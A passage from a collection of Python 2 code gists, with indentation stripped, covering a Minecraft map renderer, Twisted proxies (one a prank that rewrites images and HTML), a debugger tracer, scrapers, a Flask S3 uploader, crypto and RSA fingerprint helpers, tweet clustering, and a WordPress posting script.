elif (type == 7):
payload = read_byte_array(chunk)
elif (type == 8):
payload = read_string(chunk)
elif (type == 9):
payload = read_list_payload(chunk)
elif (type == 10):
payload = read_compound(chunk)
return (type, name, payload)
chunk = open('c.-d.18', 'r')
output = read_tag(chunk)
print output[0]
for level in output[2]:
# skip end tags
if (level[0] == 0):
continue
for tag in level[2]:
if (tag[0] == 0):
continue
print tag[1]
if tag[1] == "Blocks":
blocks = tag[2]
print "Blocks retrieved"
print "Blocks count: %d" % len(blocks)
y = 16
# Print map by block ID
for z in range(0, 16):
for x in range (0, 16):
print ord(blocks[ y + ( z * 128 + (x * 128 * 16)) ]),
print
def get_cropbox(x, y):
return (x*16, y*16, x*16 + 16, y*16 + 16)
terrain = Image.open("terrain.png")
stone = terrain.crop(get_cropbox(0,0))
dirt = terrain.crop(get_cropbox(2,0))
gravel = terrain.crop(get_cropbox(3,1))
sand = terrain.crop(get_cropbox(2,1))
coal = terrain.crop(get_cropbox(2,2))
iron = terrain.crop(get_cropbox(1,2))
gold = terrain.crop(get_cropbox(0,2))
redstone = terrain.crop(get_cropbox(3,3))
diamond = terrain.crop(get_cropbox(2,3))
map = Image.new("RGB", (256, 256))
# Draw map
for x in range(0, 16):
for z in range (0, 16):
block_id = ord(blocks[ y + ( z * 128 + (x * 128 * 16)) ])
if block_id == 1:
map.paste(stone, get_cropbox(x, z))
elif block_id == 3:
map.paste(dirt, get_cropbox(x, z))
elif block_id == 13:
map.paste(gravel, get_cropbox(x, z))
elif block_id == 12:
map.paste(sand, get_cropbox(x, z))
elif block_id == 16:
map.paste(coal, get_cropbox(x, z))
elif block_id == 15:
map.paste(iron, get_cropbox(x, z))
elif block_id == 14:
map.paste(gold, get_cropbox(x, z))
elif block_id == 73:
map.paste(redstone, get_cropbox(x, z))
elif block_id == 56:
map.paste(diamond, get_cropbox(x, z))
try:
map.save('.\map.png', 'PNG')
except:
print "Something went wrong on save"
```
#### File: hard-gists/709384/snippet.py
```python
from twisted.internet import reactor
from twisted.web import proxy, server
from twisted.web.resource import Resource
class ProxyResource(Resource):
def getChild(self, path, request):
request.received_headers['x-forwarded-host'] = request.received_headers['host']
if path.startswith('live'):
return proxy.ReverseProxyResource('localhost', 8090, '/live')
return proxy.ReverseProxyResource('localhost', 8001, '/' + path)
if __name__ == '__main__':
root = ProxyResource()
reactor.listenTCP(8000, server.Site(root))
reactor.run()
```
#### File: hard-gists/7183354/snippet.py
```python
import re
import sys
import pefile
from pydbg import *
from pydbg.defines import *
def parseidalog(file):
all_funcs = []
f = open(file)
funcs = f.readlines()
f.close()
for func in funcs:
if 'sub_' in func:
m = re.search('.text .+ 0', func)
addr = '0x'+m.group(0)[6:-2].replace('\n','')
addr = int(addr, 16)
all_funcs.append(addr)
return all_funcs
def printeip(dbg):
eip = dbg.context.Eip
if eip not in most_used_funcs:
most_used_funcs.append(eip)
print 'Break Point Hit ', hex(eip)
return DBG_CONTINUE
def setallbp(dbg):
for fun in all_func:
#print '[+] Setting soft bp on ',hex(fun)
dbg.bp_set(fun,handler=printeip)
return DBG_CONTINUE
def main():
global all_func
global most_used_funcs
most_used_funcs = []
all_func = parseidalog('ida-export.txt')
dbg = pydbg()
exe_file = sys.argv[1]
pe = pefile.PE(exe_file)
dbg = pydbg()
dbg.load(exe_file)
entry = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint
dbg.bp_set(entry,handler=setallbp)
dbg.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/71eda2aab0ee32d19b01/snippet.py
```python
from github import Github
import urllib2
import codecs
import sys
import re
UTF8Writer = codecs.getwriter('utf8')
sys.stdout = UTF8Writer(sys.stdout)
oauthToken = open('.oauthToken', 'r').read()
github = Github(login_or_token=oauthToken)
def print_repo(repo_url):
match = re.match('.+github.com/([^/]+/[^/]+).*', repo_url)
if match is not None:
repo_name = match.group(1)
repo = github.get_repo(repo_name)
for item in [
repo.owner.name,
repo.owner.login,
repo.name,
repo.created_at,
repo.description,
repo.language,
repo.stargazers_count]:
print item if item else '',
print '\t',
print ''
url = 'https://docs.google.com/spreadsheets/d/1XvGfi3TxWm7kuQ0DUqYrO6cxva196UJDxKTxccFqb9U/pub?gid=0&single=true&output=tsv'
response = urllib2.urlopen(url)
tsv = response.read()
lines = tsv.split('\r\n')
keys = lines.pop(0).split('\t')
for line in lines:
values = line.split('\t')
item = dict(zip(keys, values))
repo_url = item['GitHub']
print_repo(repo_url)
```
#### File: hard-gists/7226559/snippet.py
```python
from bs4 import BeautifulSoup
from ConfigParser import ConfigParser
from PySide.QtCore import QThread,Qt,Signal
from PySide.QtGui import QTableWidget,QAbstractItemView,QTableWidgetItem,QBrush,QColor,QApplication
from threading import Thread
import webbrowser
import sys
import time
#from urllib2 import urlopen
import urllib
import urllib2
CONFIGFILE='videoupdater.txt'
SECTION='lastest'
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor())
opener.addheaders=[('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0'),
('Content-Type', 'application/x-www-form-urlencoded')]
VIDEO=[(u'我真的是专家','http://i.youku.com/u/UNDE0MTc5OTI=/videos','UNDE0MTc5OTI','youku'),
(u'sinbasara','http://i.youku.com/u/UMzQ5MjA4NDI4/videos','UMzQ5MjA4NDI4','youku'),
(u'123来呀','http://i.youku.com/u/UMzEwNTUzNjc2/videos','UMzEwNTUzNjc2','youku'),
(u'飞碟说','http://i.youku.com/u/UNTMxOTkwNjA0/videos','UNTMxOTkwNjA0','youku'),
(u'笑打扮哲学','http://i.youku.com/u/UMTM4NDk2MjA=/videos','UMTM4NDk2MjA','youku'),
(u'各种被干','http://i.youku.com/u/UMTQ0NzE0NzI0/videos','UMTQ0NzE0NzI0','youku'),
(u'敖厂长y','http://i.youku.com/u/UMjA0NTg4Njcy/videos','UMjA0NTg4Njcy','youku'),
(u'hawkao','http://i.youku.com/u/UMjU1MzY1ODg=/videos','UMjU1MzY1ODg','youku'),
(u'财经郎眼','http://www.youku.com/show_page/id_zc0818720404711e29013.html','id_zc0818720404711e29013','youkushow'),
(u'天天向上','http://www.youku.com/show_page/id_z9510781e2d4411e296ac.html','id_z9510781e2d4411e296ac','youkushow'),
(u'快乐大本营','http://www.youku.com/show_page/id_zd18a7caa2d4311e29498.html','id_zd18a7caa2d4311e29498','youkushow'),
#(u'老友记','http://www.youku.com/show_page/id_zafef34ece06211e19013.html','id_zafef34ece06211e19013','youkushow'),
(u'晓说','http://www.youku.com/show_page/id_z64feb2249b8211e296da.html','id_z64feb2249b8211e296da','youkushow'),
#(u'娱乐百分百','http://www.youku.com/show_page/id_z8fad81de2d6011e296ac.html','id_z8fad81de2d6011e296ac','youkushow'),
(u'国光帮帮忙','http://www.youku.com/show_page/id_z5ca3d0742d4f11e2b356.html','id_z5ca3d0742d4f11e2b356','youkushow'),
(u'罗辑思维','http://www.youku.com/show_page/id_zc40101545bdc11e2b356.html','id_zc40101545bdc11e2b356','youkushow'),
#(u'十万个冷笑话','http://www.youku.com/show_page/id_z02baa1f0cbcf11e19013.html','id_z02baa1f0cbcf11e19013','youkushow_r'),
(u'壹读','http://i.youku.com/u/UNDY0MTExNTky/videos','UNDY0MTExNTky','youku'),
(u'lukePOST','http://i.youku.com/u/UMzA3NzkwMzI4/videos','UMzA3NzkwMzI4','youku'),
(u'敖厂长t','http://www.tudou.com/home/item_u29083386s0p1.html','item_u29083386s0p1','tudou'),
(u'老湿alwayswet','http://www.tudou.com/home/item_u60173626s0p1.html','item_u60173626s0p1','tudou'),
(u'微播江湖','http://video.56.com/opera/6268.html','opera6268','56'),
(u'反犬TDog','http://i.56.com/fanquan/videos/','fanquan','56i'),
(u'锵锵三人行','http://phtv.ifeng.com/program/qqsrx/','qiangqiangsanrenxing','ifeng'),
(u'康熙来了','http://v.qq.com/variety/column/column_324.html','kangxilaile','qq'),
(u'新闻百科','http://v.qq.com/cover/b/bfal45ox1erftku.html','bfal45ox1erftku','qq2')]
result=[]
class Checker(Thread):
def __init__(self,user,url,id_,type_):
Thread.__init__(self)
self.user=user
self.url=url
self.id_=id_
self.type=type_
def soup(self):
#return BeautifulSoup(urlopen(self.url))
return BeautifulSoup(opener.open(urllib2.Request(self.url)).read())
def update(self):
global config
print self.url
timeaskey = False
if self.type=='youku':
info = self.soup().find("ul", class_="v")
self.title = info.a.get('title')
self.link = info.a.get('href')
self.time = info.find('li', class_="v_pub").span.string
elif self.type=='tudou':
info = self.soup().find("div", class_="txt")
self.link = info.a.get('href')
self.title = info.a.get('title')
self.time = info.find_all('li',limit=2)[1].string[9:].strip()
elif self.type=='56':
info = self.soup().find("div", class_="episode_cnt").find('a')
self.link=info.get('href')
self.title=info.find("span",class_="txt").string
self.time=info.find("span",class_="time").string
elif self.type=='youkushow':
info = self.soup().find("div", id="episode").find('li')
self.link = info.a.get('href')
self.title = info.a.get('title')
self.time=info.label.string
elif self.type=='qq':
info = self.soup().find("div", class_="mod_item")
temp = info.find('h6').a
self.title = temp.get('title')+(','.join([a.string for a in info.find('li', class_='date').find_all('a')]))
self.link = temp.get('href')
#self.time = info.find('span', class_="mod_version").string[5:10]
self.time = info.find('em', class_="mask_txt").string[5:10]
elif self.type=='ifeng':
info = self.soup().find("h2")
self.title = info.span.string
self.link = self.url
self.time = info.em.string[5:10]
timeaskey = True
elif self.type=='youkushow_r':
info = self.soup().find("div", id="episode").find_all('a')[-1]
self.link = info.get('href')
self.title = info.get('title')
self.time = self.title[0:2]
self.title = self.title[2:].strip()
elif self.type=='qq2':
info = self.soup().find('li',class_='item')
self.title = info.find('strong',class_='video_title').string
self.link = self.url
self.time = info.a.get('ut')[5:]
timeaskey = True
elif self.type=='56i':
info = self.soup().find("div", class_="m_v_list_txt")
tmp = info.find('a')
self.link=tmp.get('href')
self.title=tmp.get('title')
self.time=info.find('span').string[3:]
if timeaskey:
self.key=self.time
else:
self.key=self.link
new=False
if not config.has_option(SECTION, self.id_) or not config.get(SECTION, self.id_)==self.key:
config.set(SECTION, self.id_, self.key)
new=True
result.append((self.user,self.time,self.title,self.link,new))
def run(self):
# self.update()
try:
self.update()
except:
print 'error'
result.append((self.user,'error','error',self.url,True))
class Updater(object):
def __init__(self):
global config
config = ConfigParser()
config.read(CONFIGFILE)
if not config.has_section(SECTION):
config.add_section(SECTION)
def getLatest(self):
threads=[]
try:
for (user,url,id_,type_) in VIDEO:
t=Checker(user,url,id_,type_)
t.setDaemon(True)
t.start()
threads.append((t))
for thread in threads:
thread.join(60)
with open(CONFIGFILE,'w') as configfile:
config.write(configfile)
except:
print 'error'
class MyTable(QTableWidget):
def __init__(self, *args):
QTableWidget.__init__(self, *args)
self.thread = VideoThread(self)
self.thread.dataReady.connect(self.update, Qt.QueuedConnection)
self.init()
def init(self):
self.setHorizontalHeaderLabels([u'作者',u'更新时间',u'视频名称',u'视频链接'])
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.cellClicked.connect(self.clik)
def update(self):
self.setWindowTitle(time.ctime(time.time()))
row=0
for (user,_,_,_) in VIDEO:
# index=0
for index,info in enumerate(result):
if user==info[0]:
self.insertRow(row)
for column in range(4):
item = QTableWidgetItem(info[column])
if info[4]:
item.setForeground(QBrush(QColor(255,0,0)))
self.setItem(row, column, item)
result.pop(index)
break
# index+=1
row +=1
# for info in result:
# self.insertRow(row)
# for column in range(4):
# item = QTableWidgetItem(info[column])
# if info[4]:
# item.setForeground(QBrush(QColor(255,0,0)))
# self.setItem(row, column, item)
# row +=1
self.resizeColumnsToContents()
self.setFixedSize(self.horizontalHeader().length() + 30, self.verticalHeader().length() + 30);
self.show()
def clik(self, row, column):
print 'clicked',row,column
if column == 3 :
item=self.item(row, column)
if item:
url=item.text()
if url.startswith('http://'):
webbrowser.open(url)
if column == 0:
for (user,url,_,_) in VIDEO:
if(self.item(row, column).text()==user):
webbrowser.open(url)
# def closeEvent(self, event):
# event.accept()
# self.thread.terminate()
# sys.exit()
class VideoThread(QThread):
dataReady = Signal(object)
def run(self):
print time.ctime(time.time()),u' - 检查视频更新'
Updater().getLatest()
self.dataReady.emit('')
if __name__=='__main__':
app = QApplication(sys.argv)
table=MyTable(0, 4)
table.thread.start()
app.exec_()
sys.exit()
```
#### File: hard-gists/7228939/snippet.py
```python
from cStringIO import StringIO
from boto.s3.connection import S3Connection
from boto.s3.key import Key as S3Key
from flask import Flask
from flask.ext.restful import Api as FlaskRestfulAPI, Resource, reqparse, abort
from werkzeug.datastructures import FileStorage
## config
ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png']
FILE_CONTENT_TYPES = { # these will be used to set the content type of S3 object. It is binary by default.
'jpg': 'image/jpeg',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
AWS_ACCESS_KEY_ID = 'aws-access-key-id'
AWS_SECRET_ACCESS_KEY = 'aws-secret-access-key'
## app initilization
app = Flask(__name__)
app.config.from_object(__name__)
## extensions
api = FlaskRestfulAPI(app)
## Helper Methods
def upload_s3(file, key_name, content_type, bucket_name):
"""Uploads a given StringIO object to S3. Closes the file after upload.
Returns the URL for the object uploaded.
Note: The acl for the file is set as 'public-acl' for the file uploaded.
Keyword Arguments:
file -- StringIO object which needs to be uploaded.
key_name -- key name to be kept in S3.
content_type -- content type that needs to be set for the S3 object.
bucket_name -- name of the bucket where file needs to be uploaded.
"""
# create connection
conn = S3Connection(app.config['AWS_ACCESS_KEY_ID'], app.config['AWS_SECRET_ACCESS_KEY'])
# upload the file after getting the right bucket
bucket = conn.get_bucket(bucket_name)
obj = S3Key(bucket)
obj.name = key_name
obj.content_type = content_type
obj.set_contents_from_string(file.getvalue())
obj.set_acl('public-read')
# close stringio object
file.close()
return obj.generate_url(expires_in=0, query_auth=False)
class FileStorageArgument(reqparse.Argument):
"""This argument class for flask-restful will be used in
all cases where file uploads need to be handled."""
def convert(self, value, op):
if self.type is FileStorage: # only in the case of files
# this is done as self.type(value) makes the name attribute of the
# FileStorage object same as argument name and value is a FileStorage
# object itself anyways
return value
# called so that this argument class will also be useful in
# cases when argument type is not a file.
super(FileStorageArgument, self).convert(*args, **kwargs)
## API Endpoints
class UploadImage(Resource):
put_parser = reqparse.RequestParser(argument_class=FileStorageArgument)
put_parser.add_argument('image', required=True, type=FileStorage, location='files')
def put(self):
#TODO: a check on file size needs to be there.
args = self.put_parser.parse_args()
image = args['image']
# check logo extension
extension = image.filename.rsplit('.', 1)[1].lower()
if '.' in image.filename and not extension in app.config['ALLOWED_EXTENSIONS']:
abort(400, message="File extension is not one of our supported types.")
# create a file object of the image
image_file = StringIO()
image.save(image_file)
# upload to s3
key_name = '{0}.{1}'.format('some-name', extension)
content_type = app.config['FILE_CONTENT_TYPES'][extension]
bucket_name = 'bucket-is-me'
logo_url = upload_s3(image_file, key_name, content_type, bucket_name)
return {'logo_url': logo_url}
api.add_resource(UploadImage, '/upload_image')
if __name__ == '__main__':
app.run(debug=True)
```
#### File: hard-gists/7230348/snippet.py
```python
from Crypto.Cipher import DES3
def _make_des3_encryptor(key, iv):
encryptor = DES3.new(key, DES3.MODE_CBC, iv)
return encryptor
def des3_encrypt(key, iv, data):
encryptor = _make_des3_encryptor(key, iv)
pad_len = 8 - len(data) % 8 # length of padding
padding = chr(pad_len) * pad_len # PKCS5 padding content
data += padding
return encryptor.encrypt(data)
def des3_decrypt(key, iv, data):
encryptor = _make_des3_encryptor(key, iv)
result = encryptor.decrypt(data)
pad_len = ord(result[-1])
result = result[:-pad_len]
return result
```
#### File: hard-gists/7236266/snippet.py
```python
from django.core.management.base import BaseCommand
from mymodule import main
import logging
class Command(BaseCommand):
help = 'Do foo'
def handle(self, *args, **options):
# Setup logging
#
# Verbosity levels:
# 1 - prints nothing
# 2 - Prints log messages for just this module
# 3 or greater - Prints log messages from any module
options['verbosity'] = int(options['verbosity'])
if options['verbosity'] > 1:
if options['verbosity'] == 2:
# use logger for just this module
logger = logging.getLogger('mymodule')
else:
# use root logger
logger = logging.getLogger('')
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
console.setFormatter(logging.Formatter('%(name)s - %(levelname)s - %(message)s'))
logger.addHandler(console)
main()
```
#### File: hard-gists/7270594/snippet.py
```python
import hashlib
import optparse
import paramiko
from Crypto.PublicKey import RSA
def insert_char_every_n_chars(string, char='\n', every=64):
return char.join(
string[i:i + every] for i in xrange(0, len(string), every))
def get_rsa_key(key_location=None, key_file_obj=None, passphrase=<PASSWORD>,
use_pycrypto=False):
key_fobj = key_file_obj or open(key_location)
try:
if use_pycrypto:
key = RSA.importKey(key_fobj, passphrase=<PASSWORD>phrase)
else:
key = paramiko.RSAKey.from_private_key(key_fobj,
password=<PASSWORD>)
return key
except (paramiko.SSHException, ValueError):
raise Exception(
"Invalid RSA private key file or missing passphrase: %s" %
key_location)
def get_public_key(key):
return ' '.join([key.get_name(), key.get_base64()])
def generate_rsa_key():
return paramiko.RSAKey.generate(2048)
def get_private_rsa_fingerprint(key_location=None, key_file_obj=None,
passphrase=None):
"""
Returns the fingerprint of a private RSA key as a 59-character string (40
characters separated every 2 characters by a ':'). The fingerprint is
computed using the SHA1 (hex) digest of the DER-encoded (pkcs8) RSA private
key.
"""
k = get_rsa_key(key_location=key_location, key_file_obj=key_file_obj,
passphrase=<PASSWORD>phrase, use_pycrypto=True)
sha1digest = hashlib.sha1(k.exportKey('DER', pkcs=8)).hexdigest()
fingerprint = insert_char_every_n_chars(sha1digest, ':', 2)
print '>>> RSA Private Key Fingerprint:\n%s' % fingerprint
return fingerprint
def get_public_rsa_fingerprint(key_location=None, key_file_obj=None,
passphrase=None):
"""
Returns the fingerprint of the public portion of an RSA key as a
47-character string (32 characters separated every 2 characters by a ':').
The fingerprint is computed using the MD5 (hex) digest of the DER-encoded
RSA public key.
"""
privkey = get_rsa_key(key_location=key_location, key_file_obj=key_file_obj,
passphrase=<PASSWORD>phrase, use_pycrypto=True)
pubkey = privkey.publickey()
md5digest = hashlib.md5(pubkey.exportKey('DER')).hexdigest()
fingerprint = insert_char_every_n_chars(md5digest, ':', 2)
print '>>> RSA Public Key Fingerprint:\n%s' % fingerprint
return fingerprint
def main():
usage = 'usage: ec2fingerprint [options] <rsakey>'
parser = optparse.OptionParser(usage=usage)
parser.add_option("-p", "--public-only", dest="public_only",
action="store_true",
default=False)
parser.add_option("-P", "--private-only", dest="private_only",
action="store_true",
default=False)
opts, args = parser.parse_args()
if len(args) != 1:
parser.error("please specify a single RSA private key file")
path = args[0]
if opts.public_only:
get_public_rsa_fingerprint(key_location=path)
elif opts.private_only:
get_private_rsa_fingerprint(key_location=path)
else:
get_public_rsa_fingerprint(key_location=path)
print
get_private_rsa_fingerprint(key_location=path)
if __name__ == '__main__':
main()
```
#### File: hard-gists/7301722/snippet.py
```python
from twisted.internet import reactor
from twisted.web import proxy, http
from PIL import Image
import StringIO
import zlib
img = Image.open("hoff.png")
class LoggingProxyClient(proxy.ProxyClient):
def __init__(self, command, rest, version, headers, data, father):
del headers["accept-encoding"]
proxy.ProxyClient.__init__(self, command, rest, version, headers, data, father)
self.isImage = False
self.isHtml = False
self.buffer = ""
def handleStatus(self, version, code, message):
proxy.ProxyClient.handleStatus(self, version, code, message)
def handleHeader(self, key, value):
if key.lower() == "content-type" and value.startswith("image/"):
self.isImage = True
self.isHtml = False
self.imageType = value
elif key.lower() == "content-type" and value.startswith("text/html"):
self.isHtml = True
self.isImage = False
proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, buffer):
#proxy.ProxyClient.handleResponsePart(self, buffer)
self.buffer += buffer
def handleResponseEnd(self):
if not self._finished:
if self.isImage:
try:
oldBuffer = StringIO.StringIO(self.buffer)
oldImg = Image.open(oldBuffer)
w, h = oldImg.size
if w > 50 and h > 50 and w >= h:
print "Inserting the hoff into image of size: ", str(oldImg.size)
nh = h/2
nw = nh * img.size[0] / img.size[1]
mask = Image.new("RGBA", oldImg.size)
maskData = mask.load()
for x in xrange(0, w):
for y in xrange(0, h):
maskData[x, y] = (0xFF, 0xFF, 0xFF, 0xFF)
newImg = oldImg.copy().convert("RGBA")
pasteImg = img.copy().resize((nw, nh))
newImg = Image.blend(newImg, mask, 0.5)
newImg.paste(pasteImg, (w - nw, h - nh), pasteImg)
newBuffer = StringIO.StringIO()
if self.imageType == "image/png":
newImg.save(newBuffer, "PNG")
elif self.imageType in ("image/jpg", "image/jpeg"):
newImg.save(newBuffer, "JPEG")
self.buffer = newBuffer.getvalue()
self.father.responseHeaders.setRawHeaders("Cache-Control", ["no-cache"])
except Exception as e:
print repr(e)
elif self.isHtml:
print "Hoffifying HTML"
#try:
# newBuffer = zlib.decompress(self.buffer)
#except:
# newBuffer = self.buffer
newBuffer = self.buffer
self.buffer = newBuffer \
.replace("He ", " The Hoff ") \
.replace("She ", " The Hoff ") \
.replace("Jag", " The Hoff ") \
.replace("Han ", " The Hoff ") \
.replace("han ", " The Hoff ") \
.replace("Honom", " The Hoff ") \
.replace("honom", " The Hoff ") \
.replace("Hon ", " The Hoff ") \
.replace("hon ", " The Hoff ") \
.replace("Henne", " The Hoff ") \
.replace("henne", " The Hoff ")
#print self.buffer
self.father.responseHeaders.setRawHeaders("Content-Length", [str(len(self.buffer))])
self.father.write(self.buffer)
proxy.ProxyClient.handleResponseEnd(self)
class LoggingProxyClientFactory(proxy.ProxyClientFactory):
protocol = LoggingProxyClient
class LoggingProxyRequest(proxy.ProxyRequest):
protocols = { "http": LoggingProxyClientFactory }
def process(self):
# when the client isn't aware it's talking to a proxy, it won't send
# the full path to the web server. here we prepend http:// and the server
# host to the uri
if not self.uri.startswith("http://") and not self.uri.startswith("https://"):
self.uri = "http://" + self.getHeader("Host") + self.uri
print "Request from %s for %s" % (self.getClientIP(), self.uri)
try:
proxy.ProxyRequest.process(self)
except KeyError:
print "HTTPS is not supported at the moment!"
class LoggingProxy(proxy.Proxy):
requestFactory = LoggingProxyRequest
class LoggingProxyFactory(http.HTTPFactory):
def buildProtocol(self, addr):
return LoggingProxy()
reactor.listenTCP(8080, LoggingProxyFactory())
reactor.run()
```
#### File: hard-gists/730765/snippet.py
```python
from django.db.models.signals import post_init
def track_data(*fields):
"""
Tracks property changes on a model instance.
The changed list of properties is refreshed on model initialization
and save.
>>> @track_data('name')
>>> class Post(models.Model):
>>> name = models.CharField(...)
>>>
>>> @classmethod
>>> def post_save(cls, sender, instance, created, **kwargs):
>>> if instance.has_changed('name'):
>>> print "Hooray!"
"""
UNSAVED = dict()
def _store(self):
"Updates a local copy of attributes values"
if self.id:
self.__data = dict((f, getattr(self, f)) for f in fields)
else:
self.__data = UNSAVED
def inner(cls):
# contains a local copy of the previous values of attributes
cls.__data = {}
def has_changed(self, field):
"Returns ``True`` if ``field`` has changed since initialization."
if self.__data is UNSAVED:
return False
return self.__data.get(field) != getattr(self, field)
cls.has_changed = has_changed
def old_value(self, field):
"Returns the previous value of ``field``"
return self.__data.get(field)
cls.old_value = old_value
def whats_changed(self):
"Returns a list of changed attributes."
changed = {}
if self.__data is UNSAVED:
return changed
for k, v in self.__data.iteritems():
if v != getattr(self, k):
changed[k] = v
return changed
cls.whats_changed = whats_changed
# Ensure we are updating local attributes on model init
def _post_init(sender, instance, **kwargs):
_store(instance)
post_init.connect(_post_init, sender=cls, weak=False)
# Ensure we are updating local attributes on model save
def save(self, *args, **kwargs):
save._original(self, *args, **kwargs)
_store(self)
save._original = cls.save
cls.save = save
return cls
return inner
```
#### File: hard-gists/736778/snippet.py
```python
import contextlib
import timeit
def work_pass():
pass
def work_fail():
1/0
def simple_catch(fn):
try:
fn
except Exception:
pass
@contextlib.contextmanager
def catch_context():
try:
yield
except Exception:
pass
def with_catch(fn):
with catch_context():
fn()
class ManualCatchContext(object):
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
return True
def manual_with_catch(fn):
with ManualCatchContext():
fn()
setup = 'from __main__ import simple_catch, work_pass, work_fail, with_catch, manual_with_catch'
commands = [
'simple_catch(work_pass)',
'simple_catch(work_fail)',
'with_catch(work_pass)',
'with_catch(work_fail)',
'manual_with_catch(work_pass)',
'manual_with_catch(work_fail)',
]
for c in commands:
print c, ': ', timeit.timeit(c, setup)
# simple_catch(work_pass) : 0.190114021301
# simple_catch(work_fail) : 0.190967082977
# with_catch(work_pass) : 5.82143998146
# with_catch(work_fail) : 9.16547012329
# manual_with_catch(work_pass) : 1.06963706017
# manual_with_catch(work_fail) : 1.43239498138
```
#### File: hard-gists/7398239/snippet.py
```python
import csv
import codecs
import numpy as np
import MeCab
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.decomposition import TruncatedSVD
from sklearn.preprocessing import Normalizer
FILENAME = 'tweets.csv'
NUM_CLUSTERS = 1000
LSA_DIM = 500
MAX_DF = 0.8
MAX_FEATURES = 10000
MINIBATCH = True
def get_tweets_from_csv(filename):
ret = csv.reader(open(filename))
tweets = [r[7].decode('utf-8') for r in ret]
for tweet in tweets[:]:
if u'@' in tweet:
tweets.remove(tweet)
if len(tweet) <= 3:
tweets.remove(tweet)
return tweets
def analyzer(text):
ret = []
tagger = MeCab.Tagger('-Ochasen')
node = tagger.parseToNode(text.encode('utf-8'))
node = node.next
while node.next:
ret.append(node.feature.split(',')[-3].decode('utf-8'))
node = node.next
return ret
def main(filename):
# load tweets
tweets = get_tweets_from_csv(filename)
# feature extraction
vectorizer = TfidfVectorizer(analyzer=analyzer, max_df=MAX_DF)
vectorizer.max_features = MAX_FEATURES
X = vectorizer.fit_transform(tweets)
# dimensionality reduction by LSA
lsa = TruncatedSVD(LSA_DIM)
X = lsa.fit_transform(X)
X = Normalizer(copy=False).fit_transform(X)
# clustering by KMeans
if MINIBATCH:
km = MiniBatchKMeans(n_clusters=NUM_CLUSTERS, init='k-means++', batch_size=1000, n_init=10, max_no_improvement=10, verbose=True)
else:
km = KMeans(n_clusters=NUM_CLUSTERS, init='k-means++', n_init=1, verbose=True)
km.fit(X)
labels = km.labels_
transformed = km.transform(X)
dists = np.zeros(labels.shape)
for i in range(len(labels)):
dists[i] = transformed[i, labels[i]]
# sort by distance
clusters = []
for i in range(NUM_CLUSTERS):
cluster = []
ii = np.where(labels==i)[0]
dd = dists[ii]
di = np.vstack([dd,ii]).transpose().tolist()
di.sort()
for d, j in di:
cluster.append(tweets[int(j)])
clusters.append(cluster)
return clusters
if __name__ == '__main__':
clusters = main(FILENAME)
f = codecs.open('%s.txt' % FILENAME, 'w', 'utf-8')
for i,tweets in enumerate(clusters):
for tweet in tweets:
f.write('%d: %s\n' % (i, tweet.replace('/n', '')))
f.close()
```
#### File: hard-gists/7428185/snippet.py
```python
import urllib
from wordpress_xmlrpc import Client, WordPressPost
from wordpress_xmlrpc.methods import posts
import xmlrpclib
from wordpress_xmlrpc.compat import xmlrpc_client
from wordpress_xmlrpc.methods import media, posts
import os
########################### Read Me First ###############################
'''
------------------------------------------In DETAIL--------------------------------
Description
===========
Add new posts to WordPress remotely using Python using XMLRPC library provided by the WordPress.
Installation Requirement
************************
Verify you meet the following requirements
==========================================
Install Python 2.7 (Don't download 3+, as most libraries dont yet support version 3).
Install from PyPI using easy_install python-wordpress-xmlrpc
Easy_Install Link: https://pypi.python.org/pypi/setuptools
==========================================
Windows Installation Guide
==========================
-Download and Install Easy_Install from above Link -Extract Downloaded File and from CMD go to the extracted directory and run 'python setup.py install'. This will install easy_install. -Go to %/python27/script and run following command easy_install python-wordpress-xmlrpc
Ubuntu Installation Guide
=========================
sudo apt-get install python-setuptools
sudo easy_install python-wordpress-xmlrpc
Note: Script has its dummy data to work initially which you can change or integrate with your code easily for making it more dynamic.
****************************************
For Bugs/Suggestions
<EMAIL>
****************************************
------------------------------------------In DETAIL--------------------------------
'''
class Custom_WP_XMLRPC:
def post_article(self,wpUrl,wpUserName,wpPassword,articleTitle, articleCategories, articleContent, articleTags,PhotoUrl):
self.path=os.getcwd()+"\\00000001.jpg"
self.articlePhotoUrl=PhotoUrl
self.wpUrl=wpUrl
self.wpUserName=wpUserName
self.wpPassword=<PASSWORD>
#Download File
f = open(self.path,'wb')
f.write(urllib.urlopen(self.articlePhotoUrl).read())
f.close()
#Upload to WordPress
client = Client(self.wpUrl,self.wpUserName,self.wpPassword)
filename = self.path
# prepare metadata
data = {'name': 'picture.jpg','type': 'image/jpg',}
# read the binary file and let the XMLRPC library encode it into base64
with open(filename, 'rb') as img:
data['bits'] = xmlrpc_client.Binary(img.read())
response = client.call(media.UploadFile(data))
attachment_id = response['id']
#Post
post = WordPressPost()
post.title = articleTitle
post.content = articleContent
post.terms_names = { 'post_tag': articleTags,'category': articleCategories}
post.post_status = 'publish'
post.thumbnail = attachment_id
post.id = client.call(posts.NewPost(post))
print 'Post Successfully posted. Its Id is: ',post.id
#########################################
# POST & Wp Credentials Detail #
#########################################
#Url of Image on the internet
ariclePhotoUrl='http://i1.tribune.com.pk/wp-content/uploads/2013/07/584065-twitter-1375197036-960-640x480.jpg'
# Dont forget the /xmlrpc.php cause thats your posting adress for XML Server
wpUrl='http://YourWebSite.com/xmlrpc.php'
#WordPress Username
wpUserName='WordPressUsername'
#WordPress Password
wpPassword='<PASSWORD>'
#Post Title
articleTitle='Testing Python Script version 3'
#Post Body/Description
articleContent='Final .... Testing Fully Automated'
#list of tags
articleTags=['code','python']
#list of Categories
articleCategories=['language','art']
#########################################
# Creating Class object & calling the xml rpc custom post Function
#########################################
xmlrpc_object = Custom_WP_XMLRPC()
#On Post submission this function will print the post id
xmlrpc_object.post_article(wpUrl,wpUserName,wpPassword,articleTitle, articleCategories, articleContent, articleTags,ariclePhotoUrl)
```
#### File: hard-gists/744413/snippet.py
```python
import os
import smtplib
import sys
import time
